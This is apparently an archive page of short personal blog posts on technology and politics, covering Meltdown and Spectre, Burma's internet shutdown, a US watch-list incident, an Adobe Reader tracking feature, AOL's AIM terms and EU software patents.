Less haste, more security

This morning’s observer column:

I ran into my favourite technophobe the other day. “I see,” he chortled, “that your tech industry (he holds me responsible for everything that is wrong with the modern world) is in meltdown!” The annoying thing is that he was partly right. What has happened is that two major security vulnerabilities – one of them has been christened “Meltdown”, the other “Spectre” – have been discovered in the Central Processing Unit (CPU) chips that power most of the computers in the world.

A CPU is a device for performing billions of apparently trivial operations in sequences determined by whatever program is running: it fetches some data from memory, performs some operations on that data and then sends it back to memory; then fetches the next bit of data; and so on. Two decades ago some wizard had an idea for speeding up CPUs…

Read on


Lest we get too optimistic about 2018, this from Eliot Cohen, Director of the Strategic Studies program at Johns Hopkins:

There are sounds, for those who can hear them, of the preliminary and muffled drumbeats of war. The Chinese are reported to be preparing refugee camps along the North Korean border. Resources are being shifted to observe and analyze the North Korean military. Mundane logistical processes of moving, stockpiling, and updating crucial items and preparing military personnel are under way. Only the biggest indicator—the evacuation of American dependents from South Korea—has yet to flash red, but, in the interest of surprise, that may not happen. America’s circumspect and statesmanlike secretary of defense, James Mattis, talks ominously of storm clouds gathering over Korea, while the commandant of the Marine Corps simply says, “I hope I’m wrong, but there’s a war coming.”

Maybe nothing will happen. Maybe Donald Trump, he of the five draft deferments during the Vietnam War, will flinch from launching a war as commander in chief, in which case the United States will merely suffer an epic humiliation as it retreats from as big a red line as a president has ever drawn. Still, lots of people have an interest in war. For Russia, the opportunity to set the United States and China against each other over Korea is a dream come true. For narrow-minded American strategists, it is the only way of cutting the North Korean nuclear Gordian knot. For Kim Jong Un peeking over the edge of the precipice may cause South Korea to break with the Americans, or the Chinese to fight them. For Donald Trump it may be a moment of glory, a dramatic vindication of campaign promises, and an opportunity to distract American minds from Robert Mueller’s investigation of his campaign’s ties to the Russians. And so threats and bluster may turn into violent realities. And if they do, not tomorrow or the next day, but some time in 2018, a Second Korean War could very well make it one of those years in which history swings on its hinge.

Burma’s Internet Crackdown

Tech Review has an interesting interview with John Palfrey of the Berkman Center. Preface to the interview reads:

The Burmese government’s recent shutdown of the country’s Internet connections amid pro-democracy protests was a new low for what is already one of the most censorious nations in the world. Earlier this year, the OpenNet Initiative–a collaboration among researchers at Harvard, Oxford, Cambridge, and the University of Toronto–found that the nation’s rulers blocked 85 percent of e-mail service providers and nearly all political-opposition and pro-democracy sites. (See “Internet Increasingly Censored.”) All this in a nation in which less than 1 percent of citizens have Internet access in the first place.

Last week–after images of the beatings of Buddhist monks and the killing of a Japanese photographer leaked out via the Internet–Burma’s military rulers took the ultimate step, apparently physically disconnecting primary telecommunications cables in two major cities, in a drastic effort to stop the flow of information from Burma to the rest of the world. It didn’t completely work: some bloggers apparently used satellite links or cellular phone services to get information outside the country.

One chilling exchange in the interview goes:

TR: How does this shutdown compare with other state-controlled actions you’ve documented?

JP: I’ve never seen anything like this cutoff to the Internet at such a broad scale so crudely and completely. They’ve taken the nuclear-bomb approach. We’ve witnessed what appear to be denial-of-service-type attacks during elections, for instance, but nothing so large-scale like this shutdown. Still, information has leaked out. So the military junta has found that given the many roots to the global telecommunications infrastructure, it’s very hard to cut off a place entirely.

So much for John Perry Barlow’s utopian dreams — to which (full disclosure) I once also subscribed. Sigh.

Homeland security

Here’s a sobering account of what happened recently to a distinguished US academic lawyer, Professor Walter Murphy of Princeton.

“On 1 March 07, I was scheduled to fly on American Airlines to Newark, NJ, to attend an academic conference at Princeton University, designed to focus on my latest scholarly book, Constitutional Democracy, published by Johns Hopkins University Press this past Thanksgiving.”

“When I tried to use the curb-side check in at the Sunport, I was denied a boarding pass because I was on the Terrorist Watch list. I was instructed to go inside and talk to a clerk. At this point, I should note that I am not only the McCormick Professor of Jurisprudence (emeritus) but also a retired Marine colonel. I fought in the Korean War as a young lieutenant, was wounded, and decorated for heroism. I remained a professional soldier for more than five years and then accepted a commission as a reserve office, serving for an additional 19 years.”

“I presented my credentials from the Marine Corps to a very polite clerk for American Airlines. One of the two people to whom I talked asked a question and offered a frightening comment: “Have you been in any peace marches? We ban a lot of people from flying because of that.” I explained that I had not so marched but had, in September, 2006, given a lecture at Princeton, televised and put on the Web, highly critical of George Bush for his many violations of the Constitution. “That’ll do it,” the man said. ”

“After carefully examining my credentials, the clerk asked if he could take them to TSA officials. I agreed. He returned about ten minutes later and said I could have a boarding pass, but added: “I must warn you, they’re going to ransack your luggage.” On my return flight, I had no problem with obtaining a boarding pass, but my luggage was “lost.” Airlines do lose a lot of luggage and this “loss” could have been a mere coincidence. In light of previous events, however, I’m a tad skeptical.”

“I confess to having been furious that any American citizen would be singled out for governmental harassment because he or she criticized any elected official, Democrat or Republican. That harassment is, in and of itself, a flagrant violation not only of the First Amendment but also of our entire scheme of constitutional government. This effort to punish a critic states my lecture’s argument far more eloquently and forcefully than I ever could. Further, that an administration headed by two men who had “had other priorities” than to risk their own lives when their turn to fight for their country came up, should brand as a threat to the United States a person who did not run away but stood up and fought for his country and was wounded in battle, goes beyond the outrageous. Although less lethal, it is of the same evil ilk as punishing Ambassador Joseph Wilson for criticizing Bush’s false claims by “outing” his wife, Valerie Plaime, thereby putting at risk her life as well as the lives of many people with whom she had had contact as an agent of the CIA. …”

Bin Laden has won, hands down. My boycott of the US stands.

Apple apes Microsoft-type cluelessness

Apple software is generally pretty well designed, so it comes a shock to find the company making the kind of dumb mistake that is normally a Microsoft speciality. The new version of Mac OS X (codenamed ‘Tiger’) comes with a facility called ‘Dashboard’ which runs ridiculous little applets called Widgets. These are basically small programs masquerading as web pages. But Tiger also includes a new version of the Safari browser with a crazily insecure default setting which could leave your system wide open to malware via these same widgets. See here for the grisly details. You can turn off the default, of course, but I guess many of the non-technical users Apple is now targeting with the Mac Mini won’t realise the need to do that. As I said, this is the kind of stuff Microsoft does (as when it shipped XP with the firewall turned off by default — now rectified, I’m glad to say).

Adobe Acrobat now enables spying on readers

Like many non-Microsoft users, I rely on Adobe pdf as a way of circulating and publishing documents. But now it transpires that

The well known PDF reader Adobe Reader reports back to a central server whenever you open specially marked PDF documents.

The newly released Adobe Reader 7 again allows authors of PDF documents to embed an arbitrary web address which is then informed whenever you open the document.

According to one of the Slashdot postings, the current Remote Approach tracking code already sends off the full file path to the PDF on your computer, which could in itself include confidential information. This use of “web-bugs” is the same functionality used by spammers to track and verify use of your email address and is done without informing the user and without his or her consent.

It’s all done with Javascript. According to the link, you can disable the spying ‘feature’ either by deleting all plugins or by renaming the plugin directory acroread7/Reader/intellinux/plug_ins. (But you have to remember to repeat this every time there is an update.)

Alternatively you can use one of the free PDF viewers (xpdf, kpdf, evince etc.), none of which allows this surreptitious functionality of reporting back.

[Thanks for Seb for the link.]

Security blindness

Interesting editorial in MIT Technology review about the long term implications of siphoning off research funding to support a narrow security agenda. Excerpt:

American technology—just like its foreign policy, domestic politics, and popular culture—has been swept up into what Presi­dent George W. Bush calls “the global war on terror.” The U.S. R&D establishment has narrowed its interests in the years since September 11, 2001, concentrating its resources on technologies that provide security: weapons systems, defenses against biological weapons, biometrics, network security. The U.S. government’s research-and-development budget is now bluntly militaristic. In fiscal year 2005, federal R&D spending rose 4.8 percent to $132.2 billion, but 80 percent of that increase went to defense research. And most of that increase is committed to the development of new weaponry, like the ­ballistic-missile defense system. In all, the government will spend 57 percent of its R&D budget for 2005, or a record $75 billion, on defense-related projects. President Bush’s proposed 2006 budget, now being debated in Congress, would introduce cuts to many civilian programs but spend an additional $600 million on defense research.

The author (Jason Pontin) goes on to point out that organisations like the Natiional Science Foundation and the national Institutes of Health are being correspondingly starved of federal funding.

AOL thinks again about AIM Terms of Service

According to eWeek (where do they get these names from?), AOL has been taken aback by the storm of protest raised by its plans to change the terms of service under which people use AIM.

“We’re not making any policy changes. We’re making some linguistic changes to clarify certain things and explain it a little better to our users,” AOL spokesperson Andrew Weinstein told eWEEK.com.

The modifications will use similar language from the AIM privacy policy to “make it clear that AOL does not read private user-to-user communications,” Weinstein said.

“We’ll be adding that to the beginning of the section to make it clear that the privacy rights discussed in that section only refer to content posted to public areas of the AIM service.”

More importantly, Weinstein said a blunt and inelegant line that reads “You waive any right to privacy” will be deleted altogether.

“That’s a phrase that should not have been in that section in the first place. It clearly caused confusion, with good reason,” Weinstein conceded.

Over the last weekend, AOL representatives moved to quell public criticism of the terms of service after the issue was first flagged on Weblogs and discussion forums.

[Thanks to Dave and Quentin for the update.]

Time to abandon AIM

According to this, AOL have modified their terms and conditions to read:

Although you or the owner of the Content retain ownership of all right, title and interest in Content that you post to any AIM Product, AOL owns all right, title and interest in any compilation, collective work or other derivative work created by AOL using or incorporating this Content. In addition, by posting Content on an AIM Product, you grant AOL, its parent, affiliates, subsidiaries, assigns, agents and licensees the irrevocable, perpetual, worldwide right to reproduce, display, perform, distribute, adapt and promote this Content in any medium. You waive any right to privacy. You waive any right to inspect or approve uses of the Content or to be compensated for any such uses.

If this is true, then nobody should use AIM. Useful though it has been, it’s time to call a halt.

EU Council approves software patents

Despite being told by the European Parliament to think again, the EU Council of Ministers has adopted the software patent directive, in the face of requests from Denmark, Poland and Portugal to reject the directive. An EU Council representative said that the Computer Implemented Inventions Directive had been adopted but was unable to give more details. As it now stands, the directive would legalize software patents. This is Really Bad News because the only people really in favour of this are a number of very large and powerful software companies, including a noted abusive monopolist based in the US. The Directive now goes back to the Parliament. If you don’t know who your MEP is, now is the time to find out. This madness has to be stopped. Among other things, it could wipe out Open Source software. The European Parliament can stop it, but will only do so if its members understand the full implications of what is being proposed.